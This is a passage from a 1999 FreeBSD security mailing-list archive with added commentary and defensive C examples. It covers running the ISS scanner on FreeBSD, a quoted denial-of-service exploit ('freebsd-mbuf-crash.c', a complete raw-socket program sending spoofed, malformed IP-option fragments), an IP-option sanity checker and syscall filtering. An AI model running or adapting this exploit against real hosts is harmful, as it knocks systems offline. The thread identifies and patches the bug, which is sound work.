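    msg.msg_controllen = sizeof u.buf;
    /* MSG_CTRUNC: more descriptors arrived than we made room for; a real
     * receiver must walk and close whatever the kernel did install. */
    if (recvmsg(sock, &msg, 0) < 0 || (msg.msg_flags & MSG_CTRUNC))
        return -1;
    cm = CMSG_FIRSTHDR(&msg);
    if (cm == NULL || cm->cmsg_level != SOL_SOCKET || cm->cmsg_type != SCM_RIGHTS ||
        cm->cmsg_len != CMSG_LEN(sizeof(int)))
        return -1;
    memcpy(&fd, CMSG_DATA(cm), sizeof fd);
    return fd;
}

/* Constructed fixtures: a datagram socketpair and a pipe. The pipe's read end
 * is put in flight from sv[0] to sv[1] and the sender's copy closed, so only
 * the kernel's in-flight reference (what unp_rights counts) keeps it alive. */
static int put_fd_in_flight(int sv[2], int p[2])
{
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sv) < 0)
        return -1;
    if (pipe(p) < 0 || send_fd(sv[0], p[0]) < 0) {
        close(sv[0]); close(sv[1]);
        return -1;
    }
    close(p[0]);
    return 0;
}

/* Receive the in-flight descriptor and read through it.
 * Returns the byte count read (5 for "hello") or -1. */
int fd_passing_roundtrip(void)
{
    int sv[2], p[2], rfd, got = -1;
    char buf[16];

    if (put_fd_in_flight(sv, p) < 0)
        return -1;
    rfd = recv_fd(sv[1]);
    if (rfd >= 0 && write(p[1], "hello", 5) == 5)
        got = (int)read(rfd, buf, sizeof buf);
    if (rfd >= 0) close(rfd);
    close(p[1]); close(sv[0]); close(sv[1]);
    return got;
}

/* The case the patch is about: the receiver closes its socket with the
 * descriptor still unread, so the kernel must drop the orphaned reference
 * itself (unp_gc() on FreeBSD). Linux does so before close() returns, so the
 * pipe loses its last reader and a write fails with EPIPE.
 * Returns 1 if reclaimed, 0 if the reference leaked, -1 on setup error. */
int in_flight_fd_is_reclaimed(void)
{
    int sv[2], p[2], reclaimed;

    if (put_fd_in_flight(sv, p) < 0)
        return -1;
    close(sv[1]);               /* receiver goes away, message unread */
    close(sv[0]);
    signal(SIGPIPE, SIG_IGN);   /* observe EPIPE instead of dying */
    reclaimed = (write(p[1], "x", 1) < 0 && errno == EPIPE);
    close(p[1]);
    return reclaimed;
}
```

The check in recv_fd() on cmsg_level, cmsg_type and cmsg_len is the part most real programs skip: a peer can send plain data, or more descriptors than expected, on the same socket, and each unexpected descriptor silently installed in the receiver's table is a leak of exactly the kind the thread is chasing.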
From: Hoss Firooznia To: support@iss.net Subject: ISS on FreeBSD Hello ISS support folks, I work as a System Administrator at the University of Rochester and I'm currently evaluating your Intranet Security Scanner product for use on FreeBSD systems. I realize that you don't directly support FreeBSD, but I can confirm that it is possible to run the Linux version of ISS on FreeBSD versions 3.1 and up. I wanted to let you know what steps were necessary to get the scanner working properly in case this information is of use to you or your customers. Thanks, - Hoss -- Hoss Firooznia, UNIX SA, Department of Mathematics, University of Rochester PGP public key: ----- To run ISS (Linux version 5.3.1) under FreeBSD 3.x... 1) Make sure you have Linux support enabled in /etc/rc.conf, and make sure your kernel has SYSVSEM, SYSVSHM and SYSVMSG support compiled in (see /usr/src/sys/i386/conf/LINT for details). 2) Untar the distribution and apply this patch in the top-level directory: --- install.iss.orig Mon May 10 18:50:43 1999 +++ install.iss Mon May 10 18:52:16 1999 
@@ -150,6 +150,12 @@ NLSPATH=$NLSPATH:/usr/lib/nls/ KEYSYMDB=$KEYSYMDB:/usr/lib/X11/XKeysymDB ;; + FreeBSD) + OS=Linux + UNCOMPRESS=gunzip + NLSPATH=$NLSPATH:/usr/X11R6/lib/X11/nls/ + KEYSYMDB=$KEYSYMDB:/usr/X11R6/lib/X11/XKeysymDB + ;; Linux) OS=Linux UNCOMPRESS=gunzip 3) Run 'install.iss' as per the documentation. 4) Run 'brandelf -t Linux bin/{iss,xiss,issreport,mail-module}' from the top-level directory. 5) Make a symlink from /usr/local/bin/netscape to wherever netscape lives on your system. Scan away! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 10 19:43:36 1999 Delivered-To: freebsd-security@freebsd.org Received: from atlas.cc.uregina.ca (ATLAS.CC.UREGINA.CA [142.3.100.254]) by hub.freebsd.org (Postfix) with ESMTP id 89AB914BD5 for ; Mon, 10 May 1999 19:43:31 -0700 (PDT) (envelope-from galbraik@uregina.ca) Received: from hyperion.cc.uregina.ca (HYPERION.CC.UREGINA.CA [142.3.100.33]) by atlas.cc.uregina.ca (8.9.1/8.9.1) with ESMTP id UAA00263 for ; Mon, 10 May 1999 20:43:30 -0600 (CST) Received: from uregina.ca ([142.3.217.83]) by hyperion.cc.uregina.ca (8.9.1/8.9.1) with ESMTP id UAA15146 for ; Mon, 10 May 1999 20:43:21 -0600 (CST) Message-ID: <37379BB3.DE430DFA@uregina.ca> Date: Mon, 10 May 1999 20:53:39 -0600 
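Review bot: in the install.iss hunk the new `FreeBSD)` branch duplicates the `Linux)` branch that follows it except for the two X11 paths under /usr/X11R6; folding both into a single `FreeBSD|Linux)` case that picks the NLSPATH/KEYSYMDB prefix from a test would avoid the copy. A one-line comment that `OS=Linux` is deliberate, so that the rest of the installer selects the Linux binaries which step 4 then brands with brandelf, would also save the next reader a search.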
From: Kristopher Galbraith
Organization: University of Regina
X-Mailer: Mozilla 4.51 [en] (Win95; I)
X-Accept-Language: en
MIME-Version: 1.0
To: security@freebsd.org
Subject: [Fwd: ISS on FreeBSD (fwd)]
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I would like to say "Thank you" for posting this. I am familiar with ISS, and the fact that you can use it on FreeBSD is very applicable to this newsgroup and useful to myself. My question is this: is it for the sensor boxes only, or for the sensors and the main computer as well?

Robert Mooney wrote:
> This is not an attempt at spam. I'm on this list, and use FreeBSD at home
> and in the office. This is also not endorsed by ISS. I doubt they will
> take any responsibility for the product when modified as suggested below.
>
> Flames can be directed to /dev/null.
>
> ---------- Forwarded message ----------
> Date: Mon, 10 May 1999 20:22:48 -0400 (EDT)
> From: Hoss Firooznia > To: support@iss.net > Subject: ISS on FreeBSD > > Hello ISS support folks, > > I work as a System Administrator at the University of Rochester and I'm > currently evaluating your Intranet Security Scanner product for use on > FreeBSD systems. I realize that you don't directly support FreeBSD, but I > can confirm that it is possible to run the Linux version of ISS on FreeBSD > versions 3.1 and up. I wanted to let you know what steps were necessary to > get the scanner working properly in case this information is of use to you > or your customers. > > Thanks, > - Hoss > -- > Hoss Firooznia, UNIX SA, Department of Mathematics, University of Rochester > PGP public key: > > ----- > > To run ISS (Linux version 5.3.1) under FreeBSD 3.x... > > 1) Make sure you have Linux support enabled in /etc/rc.conf, and make sure > your kernel has SYSVSEM, SYSVSHM and SYSVMSG support compiled in > (see /usr/src/sys/i386/conf/LINT for details). > > 2) Untar the distribution and apply this patch in the top-level directory: > > --- install.iss.orig Mon May 10 18:50:43 1999 > +++ install.iss Mon May 10 18:52:16 1999 
> @@ -150,6 +150,12 @@ > NLSPATH=$NLSPATH:/usr/lib/nls/ > KEYSYMDB=$KEYSYMDB:/usr/lib/X11/XKeysymDB > ;; > + FreeBSD) > + OS=Linux > + UNCOMPRESS=gunzip > + NLSPATH=$NLSPATH:/usr/X11R6/lib/X11/nls/ > + KEYSYMDB=$KEYSYMDB:/usr/X11R6/lib/X11/XKeysymDB > + ;; > Linux) > OS=Linux > UNCOMPRESS=gunzip > > 3) Run 'install.iss' as per the documentation. > > 4) Run 'brandelf -t Linux bin/{iss,xiss,issreport,mail-module}' from the > top-level directory. > > 5) Make a symlink from /usr/local/bin/netscape to wherever netscape lives > on your system. Scan away! > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Kristopher Galbraith Technician, Computing Services, University of Regina To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 10 20:19: 0 1999 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21]) by hub.freebsd.org (Postfix) with ESMTP id 967A51591E for ; Mon, 10 May 1999 20:18:56 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from sunrise.gv.tsc.tdk.com (root@sunrise.gv.tsc.tdk.com [192.168.241.191]) by gatekeeper.tsc.tdk.com (8.8.8/8.8.8) with ESMTP id UAA03617; Mon, 10 May 1999 20:18:07 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by sunrise.gv.tsc.tdk.com (8.8.5/8.8.5) with ESMTP id UAA26154; Mon, 10 May 1999 20:18:05 -0700 (PDT) Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id UAA26058; Mon, 10 May 1999 20:18:04 -0700 (PDT) 
From: Don Lewis
Message-Id: <199905110318.UAA26058@salsa.gv.tsc.tdk.com>
Date: Mon, 10 May 1999 20:18:03 -0700
In-Reply-To: Darren Reed "freebsd mbuf crash" (May 5, 1:26am)
X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95)
To: Darren Reed , freebsd-security@FreeBSD.ORG
Subject: Re: freebsd mbuf crash
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I now suspect this is an exploit for the bug mentioned in CERT Advisory CA-98-13-tcp-denial-of-service. If so, this bug was fixed for FreeBSD 3.0-CURRENT in revision 1.105 of ip_input.c, and revision 1.50.2.22 before 2.2.8-RELEASE. Both fixes were committed on November 11, 1998. This exploit's use of a large number of options in the IP header seems to be the tipoff.

On May 5, 1:26am, Darren Reed wrote:
} Subject: freebsd mbuf crash
}
} is this one (below) taken care of ? perhaps a derivative of this ?
}
} darren
}
} /* freebsd-mbuf-crash.c by Jeff Roberson, (jeffr@nwlink.com). Dec 11 1998.
}  * I'm only releasing this as an example because the bug hardly ever reliably crashes a machine.
}  */
}
} #include <stdio.h>
} #include <stdlib.h>
} #include <string.h>
} #include <unistd.h>
} #define __FAVOR_BSD		/* BSD field names (th_sport, ...) in struct tcphdr */
} #include <sys/types.h>
} #include <sys/socket.h>
} #include <netinet/in.h>
} #include <netinet/in_systm.h>
} #include <netinet/ip.h>
} #include <netinet/tcp.h>
} #include <arpa/inet.h>
} #include <netdb.h>
}
} /* Resolve a dotted quad or a host name to a network-order address;
}  * returns INADDR_NONE if neither works. */
} in_addr_t htona(const char *host)
} {
} 	in_addr_t addr;
} 	struct hostent *hp;
}
} 	if ((addr = inet_addr(host)) == INADDR_NONE) {
} 		if ((hp = gethostbyname(host)) == NULL)
} 			return INADDR_NONE;
} 		memcpy(&addr, hp->h_addr_list[0], sizeof(addr));
} 	}
} 	return addr;
} }
}
} int main(int argc, char *argv[])
} {
} 	char buf[128];
} 	struct ip *iph = (struct ip *)buf;
} 	u_char *ipoptions = (u_char *)(buf + sizeof(struct ip));
} 	struct tcphdr *tcph = (struct tcphdr *)(buf + 60);	/* after a maximal 60-byte IP header */
} 	int s;
} 	struct sockaddr_in sin;
}
} 	if (argc != 2) {
} 		printf("usage\n\t%s <host>\n", argv[0]);
} 		exit(1);
} 	}
}
} 	s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
} 	if (s < 0) {
} 		perror("socket");
} 		exit(1);
} 	}
}
} 	memset(&sin, 0, sizeof(sin));
} 	sin.sin_family = AF_INET;
} 	sin.sin_port = htons(7);
} 	sin.sin_addr.s_addr = htona(argv[1]);
} 	if (sin.sin_addr.s_addr == INADDR_NONE) {
} 		printf("Error resolving %s\n", argv[1]);
} 		exit(1);
} 	}
}
} 	/* IP header with ip_hl = 15, i.e. 60 bytes, 40 of them options. The
} 	 * datagram is marked as a first fragment (IP_MF, offset 0) with a
} 	 * forged source address. */
} 	memset(buf, 0, sizeof(buf));
} 	iph->ip_hl = 15;
} 	iph->ip_v = 4;
} 	iph->ip_len = htons(124);
} 	iph->ip_id = htons(getpid());
} 	iph->ip_off = htons(IP_MF);
} 	iph->ip_ttl = 255;
} 	iph->ip_p = IPPROTO_TCP;
} 	memcpy(&iph->ip_dst, &sin.sin_addr, sizeof(iph->ip_dst));
} 	iph->ip_src.s_addr = htona("10.2.3.4");
}
} 	/* Options: a made-up option type 0xff claiming length 0x1a, padded with
} 	 * 0xff bytes so the "next" option at offset 26 claims length 0xff, far
} 	 * past the end of the header; the last byte is an IP_NOP. */
} 	memset(ipoptions, 0xff, 20);
} 	ipoptions[0] = 0xff;	/* Made up option */
} 	ipoptions[1] = 0x1a;
} 	memset(&ipoptions[2], 0xff, 37);
} 	ipoptions[39] = 1;	/* IP_NOP */
}
} 	tcph->th_sport = htons(5505);
} 	tcph->th_dport = htons(23);
} 	tcph->th_seq = htonl(0xabcde123);
} 	tcph->th_ack = htonl(0x321edcba);
} 	tcph->th_flags = TH_ACK | TH_PUSH;
} 	tcph->th_win = htons(0x1234);
}
} 	/* Two copies of the first fragment ... */
} 	if (sendto(s, buf, 124, 0, (struct sockaddr *)&sin, sizeof(sin)) < 124) {
} 		perror("sendto");
} 		exit(1);
} 	}
} 	if (sendto(s, buf, 124, 0, (struct sockaddr *)&sin, sizeof(sin)) < 124) {
} 		perror("sendto");
} 		exit(1);
} 	}
}
} 	/* ... then a last fragment (no IP_MF) at offset 8, i.e. 64 bytes in. */
} 	iph->ip_len = htons(80);
} 	iph->ip_off = htons(8);
} 	if (sendto(s, buf, 80, 0, (struct sockaddr *)&sin, sizeof(sin)) < 80) {
} 		perror("sendto");
} 		exit(1);
} 	}
} 	exit(0);
} }
}
} To Unsubscribe: send mail to majordomo@FreeBSD.org
} with "unsubscribe freebsd-security" in the body of the message
}-- End of excerpt from Darren Reed

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue May 11 12:57: 4 1999
Delivered-To: freebsd-security@freebsd.org
Received: from gw.whitefang.com (calnet11-70.gtecablemodem.com [207.175.234.70]) by hub.freebsd.org (Postfix) with SMTP id 8C62A15DF2 for ; Tue, 11 May 1999 12:56:42 -0700 (PDT) (envelope-from shadows@whitefang.com)
Received: (qmail 5732 invoked from network); 11 May 1999 19:56:39 -0000
Received: from rage.whitefang.com (shadows@192.168.1.3) by gw.whitefang.com with SMTP; 11 May 1999 19:56:39 -0000
Date: Tue, 11 May 1999 12:55:40 -0700 (PDT)
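Don Lewis points at the option-laden IP header as the tipoff. As an added example, not the FreeBSD fix and not code from the thread, here is the length sanity pass a receiver should make over the options area of an IPv4 header before acting on any option, run against a header constructed the way the program above builds its own (60 bytes, version 4, ihl 15, the same option bytes) and against a well-formed record-route option. The rules applied are the ones RFC 791 implies: only EOL and NOP are single-byte options, every other option carries a length byte of at least 2, no option may extend past the end of the options area, and the pointer in a route option starts at 4. The option type constants and the sample byte strings are defined here for the example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IPOPT_EOL   0
#define IPOPT_NOP   1
#define IPOPT_RR    7       /* record route */
#define IPOPT_LSRR  131     /* loose source route */
#define IPOPT_SSRR  137     /* strict source route */

/* Walk the options area of an IPv4 header. Returns -1 if every option is well
 * formed, else the offset of the first bad one. Only EOL and NOP are one byte;
 * any other option carries a length byte that must be >= 2 and must not run
 * past the end of the area; route options also carry a pointer >= 4. */
long ip_options_first_bad(const uint8_t *opts, size_t len)
{
    size_t i = 0;

    while (i < len) {
        uint8_t type = opts[i];
        size_t optlen;

        if (type == IPOPT_EOL)
            return -1;                  /* the rest is padding */
        if (type == IPOPT_NOP) {
            i++;
            continue;
        }
        if (i + 1 >= len)               /* no room for the length byte */
            return (long)i;
        optlen = opts[i + 1];
        if (optlen < 2 || i + optlen > len)
            return (long)i;
        if ((type == IPOPT_RR || type == IPOPT_LSRR || type == IPOPT_SSRR) &&
            (optlen < 3 || opts[i + 2] < 4))
            return (long)i;
        i += optlen;
    }
    return -1;
}

/* Check the fixed header, then its options. Returns -1 if sane, -2 if the
 * fixed header is unusable (short buffer, wrong version, ihl out of range),
 * else the offset into the options area of the first bad option. */
long ipv4_header_first_bad(const uint8_t *pkt, size_t pktlen)
{
    size_t hlen;

    if (pktlen < 20 || (pkt[0] >> 4) != 4)
        return -2;
    hlen = (size_t)(pkt[0] & 0x0f) * 4;
    if (hlen < 20 || hlen > pktlen)
        return -2;
    return ip_options_first_bad(pkt + 20, hlen - 20);
}

/* Constructed for this example: a 60-byte header (version 4, ihl 15) whose
 * options area is filled the way freebsd-mbuf-crash.c fills its own: type
 * 0xff with length 0x1a, 0xff padding, one trailing NOP. */
void build_probe_header(uint8_t out[60])
{
    memset(out, 0, 60);
    out[0] = 0x4f;
    memset(out + 20, 0xff, 39);
    out[21] = 0x1a;
    out[59] = IPOPT_NOP;
}

long probe_header_first_bad(void)
{
    uint8_t hdr[60];
    build_probe_header(hdr);
    return ipv4_header_first_bad(hdr, sizeof hdr);
}

/* Also constructed: two NOPs, a record-route option of length 7 with its
 * pointer at 4, then EOL; and a loose-source-route option claiming length 1. */
const uint8_t kGoodOptions[12] = { 1, 1, 7, 7, 4, 0, 0, 0, 0, 0, 0, 0 };
const uint8_t kShortLengthOption[4] = { 131, 1, 0, 0 };

int main(void)
{
    printf("probe header: first bad option at offset %ld\n", probe_header_first_bad());
    printf("good options: %ld, short length: %ld\n",
           ip_options_first_bad(kGoodOptions, sizeof kGoodOptions),
           ip_options_first_bad(kShortLengthOption, sizeof kShortLengthOption));
    return 0;
}
```

On the probe header the walk accepts the first option (length 26 fits in 40 bytes) and stops at offset 26, where the padding byte 0xff is read as a type whose length byte 0xff would reach 241 bytes past the end of the header; a stack that trusts that length and indexes or copies by it is exactly what a packet like this is fishing for.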
From: Thamer Al-Herbish
To: freebsd-security@FreeBSD.ORG
Subject: Wrapping syscalls
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I've recently had the idea of wrapping system calls with a capability check per process. The end objective is to have a patch for FreeBSD that adds a system call which can be used to drop the capability of calling a certain system call.

The simplest example would be a web server that after chroot()ing would call lsyscall(EXECVE) and drop its ability to execve(). It may also drop its write() ability and so on, leaving only a few read-only system calls that would effectively make it read-only.

Has anyone attempted something similar? Is there an inherent efficiency problem with just adding checks to the beginning of every system call? I'm aware of some security issues that are _not_ solved by this: specifically dropping write() capabilities but still being able to truncate files with the open() call.

Additionally, the child process will inherit its parent's disposition and never be able to reclaim a system call.

--
Thamer Al-Herbish PGP public key:
shadows@whitefang.com http://www.whitefang.com/pgpkey.txt
[ The Secure UNIX Programming FAQ http://www.whitefang.com/sup/ ]

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue May 11 14:21:52 1999
Delivered-To: freebsd-security@freebsd.org
Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 8E35614BF6 for ; Tue, 11 May 1999 14:21:29 -0700 (PDT) (envelope-from robert@cyrus.watson.org)
Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id RAA08799; Tue, 11 May 1999 17:21:10 -0400 (EDT) (envelope-from robert@cyrus.watson.org)
Date: Tue, 11 May 1999 17:21:10 -0400 (EDT)
From: Robert Watson
X-Sender: robert@fledge.watson.org
Reply-To: Robert Watson
To: Thamer Al-Herbish
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Wrapping syscalls
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Search for wrappers in the mailing list archive -- TIS released a fairly comprehensive package that does pretty much what you describe. My own tokens kernel module does something fairly similar, hooking additional security semantics onto a process, and providing additional capabilities based on the tokens acquired and exchanged. That code is fairly experimental, however, and I'm not sure I ever put the latest code online.

I'm currently making use of the exchangeable syscall array mechanism to create speculative copies of processes to generate disk prefetches, in a different project.

On Tue, 11 May 1999, Thamer Al-Herbish wrote:

> I've recently had the idea of wrapping system calls with a
> capability check per process. The end objective is to have a patch
> for FreeBSD that adds a system call which can be used to drop the
> capability of calling a certain system call.
>
> The simplest example would be a web server that after chroot()ing
> would call lsyscall(EXECVE) and drop its ability to execve(). It may
> also drop its write() ability and so on. Leaving only a few
> read-only system calls that would effectively make it read-only.
>
> Has anyone attempted something similar? Is there an inherent
> efficiency problem with just adding checks to the beginning of every
> system call? I'm aware of some security issues that are _not_ solved
> by this: specifically dropping write() capabilities but still being
> able to truncate files with the open() call.
>
> Additionally, the child process will inherit its parent's
> disposition and never be able to reclaim a system call.
> > -- > Thamer Al-Herbish PGP public key: > shadows@whitefang.com http://www.whitefang.com/pgpkey.txt > [ The Secure UNIX Programming FAQ http://www.whitefang.com/sup/ ] > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > Robert N Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. http://www.tis.com/ Safeport Network Services http://www.safeport.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 11 14:24:16 1999 Delivered-To: freebsd-security@freebsd.org Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by hub.freebsd.org (Postfix) with ESMTP id F303614F6E for ; Tue, 11 May 1999 14:23:12 -0700 (PDT) (envelope-from avalon@cheops.anu.edu.au) Received: (from avalon@localhost) by cheops.anu.edu.au (8.9.1/8.9.1) id HAA00753; Wed, 12 May 1999 07:23:01 +1000 (EST) 
From: Darren Reed
Message-Id: <199905112123.HAA00753@cheops.anu.edu.au>
Subject: Re: Wrapping syscalls
To: shadows@whitefang.com (Thamer Al-Herbish)
Date: Wed, 12 May 1999 07:23:00 +1000 (EST)
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: from "Thamer Al-Herbish" at May 11, 99 12:55:40 pm
X-Mailer: ELM [version 2.4 PL23]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In some mail from Thamer Al-Herbish, sie said:
>
> I've recently had the idea of wrapping system calls with a
> capability check per process. The end objective is to have a patch
> for FreeBSD that adds a system call which can be used to drop the
> capability of calling a certain system call.
>
> The simplest example would be a web server that after chroot()ing
> would call lsyscall(EXECVE) and drop its ability to execve(). It may
> also drop its write() ability and so on. Leaving only a few
> read-only system calls that would effectively make it read-only.

Logging would be interesting, as would write'ing data to be sent back to the client :-) Let's hope they're not interested in using CGI either :-)

> Has anyone attempted something similar? Is there an inherent
> efficiency problem with just adding checks to the beginning of every
> system call? I'm aware of some security issues that are _not_ solved
> by this: specifically dropping write() capabilities but still being
> able to truncate files with the open() call.

The Solaris implementation of ptrace or /proc allows for a monitor process to run and actually provide return values in place of the kernel for system calls (this was described at a Usenix Security Symposium).

> Additionally, the child process will inherit its parent's
> disposition and never be able to reclaim a system call.
This isn't a capability-based solution in the traditional sense of that term, more of a means of being able to deny yourself use of certain system calls.

Darren

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue May 11 14:30: 9 1999
Delivered-To: freebsd-security@freebsd.org
Received: from gw.whitefang.com (calnet11-70.gtecablemodem.com [207.175.234.70]) by hub.freebsd.org (Postfix) with SMTP id 4137714BE1 for ; Tue, 11 May 1999 14:30:03 -0700 (PDT) (envelope-from shadows@whitefang.com)
Received: (qmail 5976 invoked from network); 11 May 1999 21:30:01 -0000
Received: from rage.whitefang.com (shadows@192.168.1.3) by gw.whitefang.com with SMTP; 11 May 1999 21:30:01 -0000
Date: Tue, 11 May 1999 14:29:02 -0700 (PDT)
From: Thamer Al-Herbish
To: Darren Reed
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Wrapping syscalls
In-Reply-To: <199905112123.HAA00753@cheops.anu.edu.au>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 12 May 1999, Darren Reed wrote:

> Logging would be interesting, as would write'ing data to be sent
> back to the client :-) Let's hope they're not interested in using
> CGI either :-)

You would need some granularity I suppose. Just looked at the TIS post; it's been done, and done well it seems.

> This isn't a capability based solution in the traditional sense of
> that term, more of a means being able to deny yourself use of certain
> system calls.

Absolutely not.

--
Thamer Al-Herbish PGP public key:
shadows@whitefang.com http://www.whitefang.com/pgpkey.txt
[ The Secure UNIX Programming FAQ http://www.whitefang.com/sup/ ]

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue May 11 15:35:53 1999
Delivered-To: freebsd-security@freebsd.org
Received: from lazlo.internal.steam.com (lazlo.steam.com [199.108.84.37]) by hub.freebsd.org (Postfix) with ESMTP id 94FAA15026 for ; Tue, 11 May 1999 15:35:51 -0700 (PDT) (envelope-from cliff@steam.com)
Received: from lazlo.internal.steam.com (cliff@lazlo.internal.steam.com [192.168.32.2]) by lazlo.internal.steam.com (8.9.3/8.9.3) with ESMTP id PAA02581; Tue, 11 May 1999 15:35:42 -0700 (PDT)
Date: Tue, 11 May 1999 15:35:42 -0700 (PDT)
From: Cliff Skolnick
X-Sender: cliff@lazlo.internal.steam.com
To: Thamer Al-Herbish
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Wrapping syscalls
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Two problems that I see off the top of my head.

1) Logging: if you disable logging you will be sad. Logging usually requires a "write" system call. I suppose you could log over a socket with send() and friends, but this may require many application changes.

2) mmap(), and perhaps more like it, define the read/write behavior as a parameter to the system call. A simple allow/disallow will not be a high enough granularity in many cases.

Would it be possible to have a generic parameter mask associated with the system call? It would solve both the above issues by having a system open the log file for write, then mask off the write flag in any following open() syscalls. You could also just mask off the write ability in mmap().

A system call filter, looks like a user/kernel firewall. :)

Cliff

On Tue, 11 May 1999, Thamer Al-Herbish wrote:

> I've recently had the idea of wrapping system calls with a
> capability check per process. The end objective is to have a patch
> for FreeBSD that adds a system call which can be used to drop the
> capability of calling a certain system call.
>
> The simplest example would be a web server that after chroot()ing
> would call lsyscall(EXECVE) and drop its ability to execve(). It may
> also drop its write() ability and so on. Leaving only a few
> read-only system calls that would effectively make it read-only.
>
> Has anyone attempted something similar? Is there an inherent
> efficiency problem with just adding checks to the beginning of every
> system call? I'm aware of some security issues that are _not_ solved
> by this: specifically dropping write() capabilities but still being
> able to truncate files with the open() call.
>
> Additionally, the child process will inherit its parent's
> disposition and never be able to reclaim a system call.
>
> --
> Thamer Al-Herbish PGP public key:
> shadows@whitefang.com http://www.whitefang.com/pgpkey.txt
> [ The Secure UNIX Programming FAQ http://www.whitefang.com/sup/ ]
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>

--
Cliff Skolnick | "They that can give up essential liberty to obtain
Steam Tunnel Operations | a little temporary safety deserve neither liberty
cliff@steam.com | nor safety."
http://www.steam.com/ | -- Benjamin Franklin, 1759

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue May 11 15:57:38 1999
Delivered-To: freebsd-security@freebsd.org
Received: from Homer.Web-Ex.com (homer.web-ex.com [209.54.66.254]) by hub.freebsd.org (Postfix) with ESMTP id C212D1514F for ; Tue, 11 May 1999 15:57:35 -0700 (PDT) (envelope-from jim@web-ex.com)
Received: from localhost (jim@localhost) by Homer.Web-Ex.com (8.9.3/8.9.3) with ESMTP id SAA64508 for ; Tue, 11 May 1999 18:57:38 -0400 (EDT)
X-Authentication-Warning: Homer.Web-Ex.com: jim owned process doing -bs
Date: Tue, 11 May 1999 18:57:38 -0400 (EDT)
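What this thread sketches, a process voluntarily dropping system calls and, as Cliff suggests, masking a parameter such as the open() access mode rather than refusing the whole call, exists today on Linux as seccomp-bpf. The following is an added example written for this page, not code from the thread and not a FreeBSD mechanism: the filter refuses execve/execveat outright, lets openat through only when the flags masked with O_ACCMODE equal O_RDONLY, and is installed in a forked child so the parent can observe each refusal as EPERM. It assumes /bin/true and /dev/null exist and a little-endian x86-64, i386 or AArch64 kernel; it covers only openat (what glibc's open() issues on current systems), so a production policy would also cover open and openat2 where the architecture has them, and every other syscall is left allowed.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stddef.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <linux/audit.h>
#include <linux/filter.h>
#include <linux/seccomp.h>

#if defined(__x86_64__)
#  define ARCH_NR AUDIT_ARCH_X86_64
#elif defined(__aarch64__)
#  define ARCH_NR AUDIT_ARCH_AARCH64
#elif defined(__i386__)
#  define ARCH_NR AUDIT_ARCH_I386
#else
#  error "add the AUDIT_ARCH_* value for this architecture"
#endif
#ifndef SECCOMP_RET_KILL_PROCESS
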